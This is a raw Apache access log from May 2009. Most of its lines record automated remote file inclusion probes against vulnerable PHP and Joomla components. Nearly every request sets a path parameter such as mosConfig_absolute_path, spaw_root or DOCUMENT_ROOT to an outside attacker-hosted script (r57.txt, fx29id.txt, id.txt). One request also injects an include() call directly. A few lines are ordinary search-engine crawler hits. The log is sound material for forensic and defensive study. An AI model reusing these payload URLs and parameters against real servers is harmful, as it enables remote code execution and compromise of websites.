72.29.82.154 - - [17/May/2009:13:13:51 -0500] "GET /logs/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
72.29.82.154 - - [17/May/2009:13:13:51 -0500] "GET /logs/access_log.1238457600/administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
72.29.82.154 - - [17/May/2009:13:13:51 -0500] "GET /administrator/components/com_securityimages/lang.php?mosConfig_absolute_path=http://www.raindrip.com/cms/baner.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:13:17:14 -0500] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 298 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:13:17:14 -0500] "GET /logs/access_log.1238803200//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:13:17:14 -0500] "GET //index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 293 "-""Mozilla/5.0"
89.111.189.11 - - [17/May/2009:13:17:14 -0500] "GET /logs/access_log.1240012800//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.yokomagazine.com/mail/bin/copyright.txt???? HTTP/1.1" 404 320 "-""Mozilla/5.0"
190.144.44.36 - - [17/May/2009:13:18:04 -0500] "GET /logs//modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
190.144.44.36 - - [17/May/2009:13:18:04 -0500] "GET //modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
190.144.44.36 - - [17/May/2009:13:18:04 -0500] "GET /logs/access_log.1227657600//modules/vwar/admin/admin.php?vwar_root=http://www.freewebtown.com/xis1/fx29id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
79.45.98.65 - - [17/May/2009:13:18:13 -0500] "GET /logs//config.php?path[docroot]=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 299 "-""libwww-perl/5.826"
79.45.98.65 - - [17/May/2009:13:18:13 -0500] "GET //config.php?path[docroot]=http://www.sklepikok.pl/robie/figa/r57.txt? HTTP/1.1" 404 294 "-""libwww-perl/5.826"
209.90.91.245 - - [17/May/2009:13:20:51 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.822"
209.90.91.245 - - [17/May/2009:13:20:51 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.822"
123.143.98.5 - - [17/May/2009:13:24:02 -0500] "GET /logs/access_log.1236988800//admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:13:24:02 -0500] "GET /logs//admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 325 "-""libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:13:24:02 -0500] "GET //admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 320 "-""libwww-perl/5.805"
123.143.98.5 - - [17/May/2009:13:24:02 -0500] "GET /logs/access_log.1238630400//admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
64.118.90.253 - - [17/May/2009:13:24:03 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.823"
64.118.90.253 - - [17/May/2009:13:24:03 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.823"
123.143.98.5 - - [17/May/2009:13:25:25 -0500] "GET /logs/access_log.1236643200//admin/editor2/spaw_control.class.php?spaw_root=http://www.steannareptile.it//administrator/idi.txt??? HTTP/1.1" 404 347 "-""libwww-perl/5.805"
62.140.23.192 - - [17/May/2009:13:26:26 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
62.140.23.192 - - [17/May/2009:13:26:26 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
62.140.23.192 - - [17/May/2009:13:26:26 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.140.23.192 - - [17/May/2009:13:26:56 -0500] "GET /logs//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 313 "-""Mozilla/5.0"
62.140.23.192 - - [17/May/2009:13:26:57 -0500] "GET /logs/access_log.1240012800//weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.140.23.192 - - [17/May/2009:13:26:57 -0500] "GET //weather/hw3.php//hw3.php?daysonly=0).include($_GET[file]).(0&file=http://stonemac.com/bbs/g/id1.txt? HTTP/1.1" 404 308 "-""Mozilla/5.0"
66.219.97.207 - - [17/May/2009:13:27:41 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 324 "-""libwww-perl/5.79"
66.219.97.207 - - [17/May/2009:13:27:42 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.79"
65.55.106.189 - - [17/May/2009:13:41:34 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.58.185.62 - - [17/May/2009:13:42:18 -0500] "GET /logs//phpyabs/moduli/libri/index.php?Azione=http://mail.cipav.org.co/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
207.58.185.62 - - [17/May/2009:13:42:18 -0500] "GET //phpyabs/moduli/libri/index.php?Azione=http://mail.cipav.org.co/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
65.55.106.189 - - [17/May/2009:13:42:31 -0500] "GET /logs/access_log.1167264000 HTTP/1.1" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
207.58.185.62 - - [17/May/2009:13:43:00 -0500] "GET /logs//phpyabs/moduli/libri/index.php?Azione=http://mangosteenworkshop.com/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
207.58.185.62 - - [17/May/2009:13:43:00 -0500] "GET //phpyabs/moduli/libri/index.php?Azione=http://mangosteenworkshop.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
218.27.203.107 - - [17/May/2009:13:44:06 -0500] "GET /?DOCUMENT_ROOT=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:13:44:08 -0500] "GET /logs/access_log.1238889600/?DOCUMENT_ROOT=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
85.214.24.22 - - [17/May/2009:13:44:34 -0500] "GET /logs//include/bbs.lib.inc.php?site_path=http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 312 "-""libwww-perl/5.803"
85.214.24.22 - - [17/May/2009:13:44:34 -0500] "GET //include/bbs.lib.inc.php?site_path=http://www.ambient-arts.co.uk/media/id.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.803"
218.27.203.107 - - [17/May/2009:13:44:36 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.249.67.180 - - [17/May/2009:13:48:07 -0500] "GET /logs/access_log.1205193600 HTTP/1.1" 200 1888 "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
218.27.203.107 - - [17/May/2009:13:49:07 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.geocities.com/valent_45/id1.txt?? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
195.239.112.19 - - [17/May/2009:13:49:44 -0500] "GET //modules/Forums/admin/admin_db_utilities.php?phpbb_root_path=http://www.hro-sk.de/Install.txt???? HTTP/1.1" 404 327 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.10) Gecko/20050716 Firefox/1.0.6"
74.52.2.130 - - [17/May/2009:13:51:56 -0500] "GET /logs////components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:13:51:56 -0500] "GET ////components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:13:52:00 -0500] "GET /logs////components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:13:52:00 -0500] "GET /logs/access_log.1239321600////components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:13:52:00 -0500] "GET ////components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 322 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:13:52:04 -0500] "GET /logs/access_log.1239321600////components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:13:52:05 -0500] "GET /logs/access_log.1239235200////components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
74.52.2.130 - - [17/May/2009:13:52:07 -0500] "GET /logs/access_log.1239235200////components/com_virtuemart/errors.php?error=http://www.sexclusiv.eu/uiu.txt?? HTTP/1.1" 404 349 "-""Mozilla/5.0"
82.151.132.176 - - [17/May/2009:13:57:24 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
82.151.132.176 - - [17/May/2009:13:57:24 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
82.151.132.176 - - [17/May/2009:13:57:24 -0500] "GET /logs/access_log.1238716800//admin/spaw/spaw_control.class.php?spaw_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.151.132.176 - - [17/May/2009:13:57:44 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:13:57:50 -0500] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:13:57:50 -0500] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 330 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:13:57:50 -0500] "GET /logs/access_log.1237680000//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 357 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:13:59:43 -0500] "GET /?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:13:59:48 -0500] "GET /logs/access_log.1230768000/?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:13:59:54 -0500] "GET /logs/?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 200 36689 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:14:00:49 -0500] "GET /logs//s_common.inc.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:14:00:49 -0500] "GET /logs/access_log.1240099200//s_common.inc.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:14:00:49 -0500] "GET //s_common.inc.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:14:00:49 -0500] "GET //s_common.inc.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 300 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:14:00:49 -0500] "GET /logs//s_common.inc.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
85.214.86.93 - - [17/May/2009:14:00:50 -0500] "GET /logs/access_log.1240099200//s_common.inc.php?DOCUMENT_ROOT=http://rsh.kiev.ua/images/idfx1.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
221.139.104.104 - - [17/May/2009:14:01:00 -0500] "GET /logs/access_log.1229299200/?_SERVER[DOCUMENT_ROOT]=http://www.ladyboss.com.ua/admin/fx29id2.txt??? HTTP/1.1" 404 310 "-""Mozilla/5.0"
210.118.194.200 - - [17/May/2009:14:02:45 -0500] "GET //skin/zero_vote/ask_password.php?%20dir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 315 "-""Mozilla/5.0"
210.118.194.200 - - [17/May/2009:14:02:45 -0500] "GET /logs//skin/zero_vote/ask_password.php?%20dir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.118.194.200 - - [17/May/2009:14:02:45 -0500] "GET /logs/access_log.1231286400//skin/zero_vote/ask_password.php?%20dir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:14:03:04 -0500] "GET //index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 293 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:14:03:04 -0500] "GET /logs//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 298 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:14:03:04 -0500] "GET /logs/access_log.1234569600//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 320 "-""Mozilla/5.0"
122.116.178.20 - - [17/May/2009:14:03:04 -0500] "GET /logs/access_log.1238284800//index.php?option=com_flyspray&Itemid=&mosConfig_absolute_path=http://www.elvstrom.fr/~citypass/sites/justcars/simple.jpg? HTTP/1.1" 404 320 "-""Mozilla/5.0"
210.118.194.200 - - [17/May/2009:14:03:34 -0500] "GET /logs/access_log.1231804800//skin/zero_vote/ask_password.php?%20dir=http://datacore.fileave.com/id.txt?? HTTP/1.1" 404 342 "-""Mozilla/5.0"
65.55.106.141 - - [17/May/2009:14:05:32 -0500] "GET /logs/access_log.1207094400 HTTP/1.0" 304 - "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
121.173.130.41 - - [17/May/2009:14:10:42 -0500] "GET //components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 327 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:14:10:42 -0500] "GET /logs//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:14:10:43 -0500] "GET /logs/access_log.1239926400//components/com_thopper/inc/contact_type.php?mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 354 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:14:12:27 -0500] "GET //?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:14:12:27 -0500] "GET /logs/access_log.1230940800//?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:14:12:29 -0500] "GET /logs//?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 200 189703 "-""Mozilla/5.0"
221.157.225.65 - - [17/May/2009:14:13:04 -0500] "GET /logs/access_log.1237248000//?_zb_path=http://driji.wap.sh/id.txt?? HTTP/1.1" 404 311 "-""Mozilla/5.0"
82.151.132.176 - - [17/May/2009:14:13:20 -0500] "GET /logs/access_log.1237939200//admin/spaw/spaw_control.class.php?spaw_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
82.151.132.176 - - [17/May/2009:14:13:20 -0500] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 317 "-""Mozilla/5.0"
82.151.132.176 - - [17/May/2009:14:13:20 -0500] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 322 "-""Mozilla/5.0"
82.151.132.176 - - [17/May/2009:14:13:20 -0500] "GET /logs/access_log.1235088000//admin/spaw/spaw_control.class.php?spaw_root=http://tstk.org//ktmllite/images/upload/sh1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
24.39.162.98 - - [17/May/2009:14:15:12 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:14:15:12 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
77.221.130.19 - - [17/May/2009:14:15:19 -0500] "GET //administrator/components/com_poll/admin.poll.phphttp://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
77.221.130.19 - - [17/May/2009:14:15:19 -0500] "GET /logs//administrator/components/com_poll/admin.poll.phphttp://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 375 "-""libwww-perl/5.805"
24.39.162.98 - - [17/May/2009:14:16:07 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:14:16:07 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:14:16:08 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.79"
24.39.162.98 - - [17/May/2009:14:16:08 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.79"
77.221.130.19 - - [17/May/2009:14:16:16 -0500] "GET //administrator/components/com_poll/admin.poll.phphttp://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 370 "-""libwww-perl/5.805"
77.221.130.19 - - [17/May/2009:14:16:16 -0500] "GET /logs//administrator/components/com_poll/admin.poll.phphttp://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 375 "-""libwww-perl/5.805"
200.54.154.10 - - [17/May/2009:14:16:17 -0500] "GET /logs/s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 305 "-""libwww-perl/5.65"
200.54.154.10 - - [17/May/2009:14:16:17 -0500] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://MiNgOnIsHoW.altervista.org/ArEa51/ideal.txt???? HTTP/1.1" 404 300 "-""libwww-perl/5.65"
77.221.130.19 - - [17/May/2009:14:19:19 -0500] "GET //administrator/components/com_banners/http://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 359 "-""libwww-perl/5.805"
77.221.130.19 - - [17/May/2009:14:19:19 -0500] "GET /logs//administrator/components/com_banners/http://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
77.221.130.19 - - [17/May/2009:14:19:27 -0500] "GET /logs//administrator/components/com_banners/http://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
77.221.130.19 - - [17/May/2009:14:19:27 -0500] "GET //administrator/components/com_banners/http://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 359 "-""libwww-perl/5.805"
77.221.130.19 - - [17/May/2009:14:19:31 -0500] "GET /logs//administrator/components/com_banners/http://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 364 "-""libwww-perl/5.805"
77.221.130.19 - - [17/May/2009:14:19:31 -0500] "GET //administrator/components/com_banners/http://www.sjobergsbygg.nu/mraneti.txt??%0D?? HTTP/1.1" 404 359 "-""libwww-perl/5.805"
222.122.26.5 - - [17/May/2009:14:19:39 -0500] "GET //guestbook1//admin.php?include_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 305 "-""Mozilla/5.0"
222.122.26.5 - - [17/May/2009:14:19:39 -0500] "GET /logs//guestbook1//admin.php?include_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
222.122.26.5 - - [17/May/2009:14:19:39 -0500] "GET /logs/access_log.1238889600//guestbook1//admin.php?include_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
222.122.26.5 - - [17/May/2009:14:20:19 -0500] "GET /logs/access_log.1239062400//guestbook1//admin.php?include_path=http://www.wizard.com.br/fx29id.txt?? HTTP/1.1" 404 332 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:14:22:14 -0500] "GET //index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 293 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:14:22:14 -0500] "GET /logs//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 298 "-""Mozilla/5.0"
121.173.130.41 - - [17/May/2009:14:22:14 -0500] "GET /logs/access_log.1237593600//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.58.185.62 - - [17/May/2009:14:22:35 -0500] "GET /logs//phpyabs/moduli/libri/index.php?Azione=http://mangosteenworkshop.com/id.txt?? HTTP/1.1" 404 319 "-""libwww-perl/5.65"
207.58.185.62 - - [17/May/2009:14:22:35 -0500] "GET //phpyabs/moduli/libri/index.php?Azione=http://mangosteenworkshop.com/id.txt?? HTTP/1.1" 404 314 "-""libwww-perl/5.65"
121.173.130.41 - - [17/May/2009:14:22:55 -0500] "GET /logs/access_log.1240444800//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://rss.jiaoshi.com.cn/data/cache/cq/eclass/copyright.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
62.44.79.35 - - [17/May/2009:14:23:34 -0500] "GET /logs/access_log.1236643200/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.44.79.35 - - [17/May/2009:14:23:34 -0500] "GET /logs/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 313 "-""Mozilla/5.0"
62.44.79.35 - - [17/May/2009:14:23:34 -0500] "GET /logs/access_log.1236902400/bookmark4u/lostpasswd.php?env[include_prefix]=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 335 "-""Mozilla/5.0"
62.44.79.35 - - [17/May/2009:14:23:34 -0500] "GET /bookmark4u/lostpasswd.php?env[include_prefix]=http://www.rgbclub.net/bbs/icon/fx29id.txt??? HTTP/1.1" 404 308 "-""Mozilla/5.0"
218.27.203.107 - - [17/May/2009:14:24:07 -0500] "GET //errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:24:07 -0500] "GET /logs//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:24:08 -0500] "GET /logs/access_log.1228521600//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:24:24 -0500] "GET /logs/access_log.1228694400//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:25:21 -0500] "GET //errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 294 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:25:21 -0500] "GET /logs/access_log.1228521600//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:25:21 -0500] "GET /logs//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 299 "-""libwww-perl/5.79"
218.27.203.107 - - [17/May/2009:14:25:34 -0500] "GET /logs/access_log.1228694400//errors.php?error=http://80.24.176.145/time//appserv/file.txt?? HTTP/1.1" 404 321 "-""libwww-perl/5.79"
